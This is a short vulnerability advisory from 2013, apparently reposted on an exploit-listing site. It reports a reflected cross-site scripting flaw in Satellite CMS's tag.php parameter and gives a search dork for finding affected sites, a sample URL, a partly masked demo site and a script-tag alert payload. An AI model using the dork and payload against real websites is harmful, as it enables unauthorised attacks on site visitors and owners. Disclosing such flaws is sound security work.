Satellite CMS cross site scripting Vulnerability

2013.01.01

Credit: Rainarmy Security Team

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: intext:\"powered by Satellite\"

##################################################################
=> Title: powered by SatelliteTM cross site scripting Vulnerability
=> Author: silent
=> Credit: Rainarmy Security Team
=> Email: hacker.silent23@yahoo.com
##################################################################
This Vulnerability appears in all powered by SatelliteTM sites.
also its apears in [tag.php?tag=] . and you can inject html codes
here too.
you can download Satellite&#8482; http://www.design.tedforbes.com/.
this is an application that makes a picture album for the net.
##################################################################
=> Dork: intext:powered by Satellite&#8482;
=> Sample: http://www.target.com/tag.php?tag=[XSS]
=> Demo: http://www.iphoXXlomo.com/tag.php?tag=[XSS]
=> XSS : <ScRiPt>alert('XSS Vuln')</sCriPt>
###################################################################
special thank to administrator , Data War , Time outer
###################################################################
wwww.rainarmy.com & www.rainarmy.com/forums
###################################################################

References:

http://www.rainarmy.com/forums

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Satellite CMS cross site scripting Vulnerability

Dork: intext:\"powered by Satellite\"

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.